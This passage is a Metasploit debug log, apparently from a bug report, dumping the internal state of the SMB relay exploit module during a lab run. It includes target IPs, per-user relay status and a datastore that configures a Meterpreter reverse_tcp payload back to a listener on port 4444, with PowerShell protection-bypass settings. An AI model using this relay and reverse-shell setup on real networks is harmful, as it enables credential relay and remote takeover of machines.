"MSI::UAC"=>false, "SMBSHARE"=>"", "RELAY_TARGETS"=>"192.168.159.22 192.168.159.246 192.168.159.11 192.168.159.87 192.168.159.86 192.168.159.128", "CAINPWFILE"=>nil, "JOHNPWFILE"=>nil, "SRV_TIMEOUT"=>25, "RELAY_TIMEOUT"=>25, "RANDOMIZE_TARGETS"=>true, "SERVICE_FILENAME"=>nil, "PSH_PATH"=>"Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "SERVICE_STUB_ENCODER"=>nil, "PAYLOAD"=>"windows/meterpreter/reverse_tcp", "LHOST"=>"192.168.159.128", "LPORT"=>4444, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "StagerRetryCount"=>10, "StagerRetryWait"=>5, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncodingFallback"=>true, "PrependMigrate"=>false, "AutoLoadStdapi"=>true, "AutoVerifySessionTimeout"=>30, "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "AutoUnhookProcess"=>false, "ReverseListenerBindPort"=>nil, "ReverseListenerComm"=>nil, "ReverseListenerBindAddress"=>nil, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "PrependMigrateProc"=>nil, "PayloadBindPort"=>nil, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "HandlerSSLCert"=>nil, "PayloadProcessCommandLine"=>"", "TARGET"=>0}]>>, @shares={"IPC$"=>#<RubySMB::Server::Share::Provider::IpcPipe:0x00007f46dca7e228 @name="IPC$">}, @relay_targets=#<Msf::Exploit::Remote::SMB::Relay::TargetList:0x00007f46dca98d80 @mon_data=#<Monitor:0x00007f46dca98d30>, @mon_data_owner_object_id=111980, @targets=[#<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8caf8 @ip="192.168.159.246", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:failed, :relay_attempted_at=>2022-03-04 14:37:00.654372967 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c058 @ip="192.168.159.128", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:attempting, :relay_attempted_at=>2022-03-04 14:37:03.774595135 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c300 @ip="192.168.159.86", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c850 @ip="192.168.159.11", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8cdc8 @ip="192.168.159.22", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c5a8 @ip="192.168.159.87", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>]>, @relay_timeout=25, @listener=#<Module:exploit/windows/smb/smb_relay datastore=[{"EXITFUNC"=>"thread", "WORKSPACE"=>nil, "VERBOSE"=>true, "EnableContextEncoding"=>false, "ContextInformationFile"=>nil, "DisablePayloadHandler"=>false, "SRVHOST"=>"0.0.0.0", "SRVPORT"=>445, "ListenerComm"=>nil, "SSL"=>false, "SSLVersion"=>"Auto", "SSLVerifyMode"=>"PEER", "SSLCipher"=>nil, "Proxies"=>nil, "CPORT"=>nil, "CHOST"=>nil, "ConnectTimeout"=>10, "TCP::max_send_size"=>0, "TCP::send_delay"=>0, "DCERPC::max_frag_size"=>4096, "DCERPC::fake_bind_multi"=>true, "DCERPC::fake_bind_multi_prepend"=>0, "DCERPC::fake_bind_multi_append"=>0, "DCERPC::smb_pipeio"=>"rw", "DCERPC::ReadTimeout"=>10, "NTLM::UseNTLMv2"=>true, "NTLM::UseNTLM2_session"=>true, "NTLM::SendLM"=>true, "NTLM::UseLMKey"=>false, "NTLM::SendNTLM"=>true, "NTLM::SendSPN"=>true, "SMB::pipe_evasion"=>false, "SMB::pipe_write_min_size"=>1, "SMB::pipe_write_max_size"=>1024, "SMB::pipe_read_min_size"=>1, "SMB::pipe_read_max_size"=>1024, "SMB::pad_data_level"=>0, "SMB::pad_file_level"=>0, "SMB::obscure_trans_pipe_level"=>0, "SMBDirect"=>true, "SMBDomain"=>"WORKGROUP", "SMBName"=>"*SMBSERVER", "SMB::VerifySignature"=>false, "SMB::ChunkSize"=>500, "SMB::Native_OS"=>"Windows 2000 2195", "SMB::Native_LM"=>"Windows 2000 5.0", "SMB::ProtocolVersion"=>"1,2,3", "SMB::AlwaysEncrypt"=>true, "SERVICE_NAME"=>nil, "SERVICE_DISPLAY_NAME"=>nil, "SERVICE_DESCRIPTION"=>nil, "SERVICE_PERSIST"=>false, "CMD::DELAY"=>3, "Powershell::persist"=>false, "Powershell::prepend_sleep"=>nil, "Powershell::prepend_protections_bypass"=>"auto", "Powershell::strip_comments"=>true, "Powershell::strip_whitespace"=>false, "Powershell::sub_vars"=>true, "Powershell::sub_funcs"=>false, "Powershell::exec_in_place"=>false, "Powershell::exec_rc4"=>false, "Powershell::remove_comspec"=>false, "Powershell::noninteractive"=>true, "Powershell::encode_final_payload"=>false, "Powershell::encode_inner_payload"=>false, "Powershell::wrap_double_quotes"=>true, "Powershell::no_equals"=>false, "Powershell::method"=>"reflection", "EXE::EICAR"=>false, "EXE::Custom"=>nil, "EXE::Path"=>nil, "EXE::Template"=>nil, "EXE::Inject"=>false, "EXE::OldMethod"=>false, "EXE::FallBack"=>false, "MSI::EICAR"=>false, "MSI::Custom"=>nil, "MSI::Path"=>nil, "MSI::Template"=>nil, "MSI::UAC"=>false, "SMBSHARE"=>"", "RELAY_TARGETS"=>"192.168.159.22 192.168.159.246 192.168.159.11 192.168.159.87 192.168.159.86 192.168.159.128", "CAINPWFILE"=>nil, "JOHNPWFILE"=>nil, "SRV_TIMEOUT"=>25, "RELAY_TIMEOUT"=>25, "RANDOMIZE_TARGETS"=>true, "SERVICE_FILENAME"=>nil, "PSH_PATH"=>"Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "SERVICE_STUB_ENCODER"=>nil, "PAYLOAD"=>"windows/meterpreter/reverse_tcp", "LHOST"=>"192.168.159.128", "LPORT"=>4444, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "StagerRetryCount"=>10, "StagerRetryWait"=>5, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncodingFallback"=>true, "PrependMigrate"=>false, "AutoLoadStdapi"=>true, "AutoVerifySessionTimeout"=>30, "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "AutoUnhookProcess"=>false, "ReverseListenerBindPort"=>nil, "ReverseListenerComm"=>nil, "ReverseListenerBindAddress"=>nil, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "PrependMigrateProc"=>nil, "PayloadBindPort"=>nil, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "HandlerSSLCert"=>nil, "PayloadProcessCommandLine"=>"", "TARGET"=>0}]>, @thread_manager=[#<Thread:0x0000000003d14220 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep_forever>, #<Thread:0x0000000003c38ec8 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep_forever>, #<Thread:0x0000000003d09348 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep_forever>, #<Thread:0x0000000003cfa0c8 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep_forever>, #<Thread:0x0000000003ced828 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep_forever>, #<Thread:0x0000000003ce2ef0 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep>, #<Thread:0x00007f46dc932b58 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep_forever>, #<Thread:0x00007f46dca55300 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep>, #<Thread:0x00007f46dca54e78 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep_forever>, #<Thread:0x00007f46dca7dbc0 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 sleep>, #<Thread:0x00007f46dcd7e5e0 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 dead>, #<Thread:0x000000000c614ea8 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 run>, #<Thread:0x000000000c795c00 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:471 dead>], @closed=false>, @dispatcher=#<RubySMB::Dispatcher::Socket:0x000000000c6155b0 @tcp_socket=#<Socket:fd 18>, @read_timeout=30>, @dialect="0x0210", @gss_authenticator=#<Msf::Exploit::Remote::SMB::Relay::Provider::AlwaysGrantAccessAuthenticator:0x000000000c615448 @provider=#<Msf::Exploit::Remote::SMB::Relay::Provider::AlwaysGrantAccess:0x00007f46dcaabf20 @allow_anonymous=false, @default_domain="WORKGROUP", @accounts=[], @generate_server_challenge=#<Proc:0x00007f46dcaabea8 /home/smcintyre/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/ruby_smb-3.0.5/lib/ruby_smb/gss/provider/ntlm.rb:253 (lambda)>, @netbios_domain="WORKGROUP", @dns_domain="WORKGROUP", @netbios_hostname="WORKGROUP", @dns_hostname="WORKGROUP">, @server_client=#<Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient:0x000000000c615498 ...>, @session_key=nil, @server_challenge="\xE9\xFF{!\xA4M>~">, @preauth_integrity_hash_algorithm=nil, @preauth_integrity_hash_value=nil, @in_packet_queue=[], @session_table={670855624=>#<Session id: 670855624, user_id: nil, state: :in_progress>, 3450283844=>#<Session id: 3450283844, user_id: "MSFLAB\\smcintyre", state: :in_progress>}, @timeout=25, @relay_targets=#<Msf::Exploit::Remote::SMB::Relay::TargetList:0x00007f46dca98d80 @mon_data=#<Monitor:0x00007f46dca98d30>, @mon_data_owner_object_id=111980, @targets=[#<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8caf8 @ip="192.168.159.246", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:failed, :relay_attempted_at=>2022-03-04 14:37:00.654372967 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c058 @ip="192.168.159.128", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:attempting, :relay_attempted_at=>2022-03-04 14:37:03.774595135 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c300 @ip="192.168.159.86", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c850 @ip="192.168.159.11", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8cdc8 @ip="192.168.159.22", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>, #<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c5a8 @ip="192.168.159.87", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>nil, :relay_attempted_at=>nil, :relayed_at=>nil, :relay_attempts=>0}}>]>, @relay_timeout=25, @listener=#<Module:exploit/windows/smb/smb_relay datastore=[{"EXITFUNC"=>"thread", "WORKSPACE"=>nil, "VERBOSE"=>true, "EnableContextEncoding"=>false, "ContextInformationFile"=>nil, "DisablePayloadHandler"=>false, "SRVHOST"=>"0.0.0.0", "SRVPORT"=>445, "ListenerComm"=>nil, "SSL"=>false, "SSLVersion"=>"Auto", "SSLVerifyMode"=>"PEER", "SSLCipher"=>nil, "Proxies"=>nil, "CPORT"=>nil, "CHOST"=>nil, "ConnectTimeout"=>10, "TCP::max_send_size"=>0, "TCP::send_delay"=>0, "DCERPC::max_frag_size"=>4096, "DCERPC::fake_bind_multi"=>true, "DCERPC::fake_bind_multi_prepend"=>0, "DCERPC::fake_bind_multi_append"=>0, "DCERPC::smb_pipeio"=>"rw", "DCERPC::ReadTimeout"=>10, "NTLM::UseNTLMv2"=>true, "NTLM::UseNTLM2_session"=>true, "NTLM::SendLM"=>true, "NTLM::UseLMKey"=>false, "NTLM::SendNTLM"=>true, "NTLM::SendSPN"=>true, "SMB::pipe_evasion"=>false, "SMB::pipe_write_min_size"=>1, "SMB::pipe_write_max_size"=>1024, "SMB::pipe_read_min_size"=>1, "SMB::pipe_read_max_size"=>1024, "SMB::pad_data_level"=>0, "SMB::pad_file_level"=>0, "SMB::obscure_trans_pipe_level"=>0, "SMBDirect"=>true, "SMBDomain"=>"WORKGROUP", "SMBName"=>"*SMBSERVER", "SMB::VerifySignature"=>false, "SMB::ChunkSize"=>500, "SMB::Native_OS"=>"Windows 2000 2195", "SMB::Native_LM"=>"Windows 2000 5.0", "SMB::ProtocolVersion"=>"1,2,3", "SMB::AlwaysEncrypt"=>true, "SERVICE_NAME"=>nil, "SERVICE_DISPLAY_NAME"=>nil, "SERVICE_DESCRIPTION"=>nil, "SERVICE_PERSIST"=>false, "CMD::DELAY"=>3, "Powershell::persist"=>false, "Powershell::prepend_sleep"=>nil, "Powershell::prepend_protections_bypass"=>"auto", "Powershell::strip_comments"=>true, "Powershell::strip_whitespace"=>false, "Powershell::sub_vars"=>true, "Powershell::sub_funcs"=>false, "Powershell::exec_in_place"=>false, "Powershell::exec_rc4"=>false, "Powershell::remove_comspec"=>false, "Powershell::noninteractive"=>true, "Powershell::encode_final_payload"=>false, "Powershell::encode_inner_payload"=>false, "Powershell::wrap_double_quotes"=>true, "Powershell::no_equals"=>false, "Powershell::method"=>"reflection", "EXE::EICAR"=>false, "EXE::Custom"=>nil, "EXE::Path"=>nil, "EXE::Template"=>nil, "EXE::Inject"=>false, "EXE::OldMethod"=>false, "EXE::FallBack"=>false, "MSI::EICAR"=>false, "MSI::Custom"=>nil, "MSI::Path"=>nil, "MSI::Template"=>nil, "MSI::UAC"=>false, "SMBSHARE"=>"", "RELAY_TARGETS"=>"192.168.159.22 192.168.159.246 192.168.159.11 192.168.159.87 192.168.159.86 192.168.159.128", "CAINPWFILE"=>nil, "JOHNPWFILE"=>nil, "SRV_TIMEOUT"=>25, "RELAY_TIMEOUT"=>25, "RANDOMIZE_TARGETS"=>true, "SERVICE_FILENAME"=>nil, "PSH_PATH"=>"Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "SERVICE_STUB_ENCODER"=>nil, "PAYLOAD"=>"windows/meterpreter/reverse_tcp", "LHOST"=>"192.168.159.128", "LPORT"=>4444, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "StagerRetryCount"=>10, "StagerRetryWait"=>5, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncodingFallback"=>true, "PrependMigrate"=>false, "AutoLoadStdapi"=>true, "AutoVerifySessionTimeout"=>30, "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "AutoUnhookProcess"=>false, "ReverseListenerBindPort"=>nil, "ReverseListenerComm"=>nil, "ReverseListenerBindAddress"=>nil, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "PrependMigrateProc"=>nil, "PayloadBindPort"=>nil, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "HandlerSSLCert"=>nil, "PayloadProcessCommandLine"=>"", "TARGET"=>0}]>>, @target=#<Msf::Exploit::Remote::SMB::Relay::Target:0x00007f46dca8c058 @ip="192.168.159.128", @port=445, @protocol=:smb, @relay_state={"MSFLAB\\smcintyre"=>{:relay_status=>:attempting, :relay_attempted_at=>2022-03-04 14:37:03.774595135 -0500, :relayed_at=>nil, :relay_attempts=>1}}>, @dialect="0x0300", @negotiated_smb_version=3, @server_guid="d\xBF\xE3\x17\xF6\xEC\x8F?6>Y\x96\xEA\\\e\xD3", @server_system_time=2022-03-04 14:37:03 -0500, @version="SMB3">
[03/04/2022 14:38:14] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[03/04/2022 14:38:16] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)

```
</details>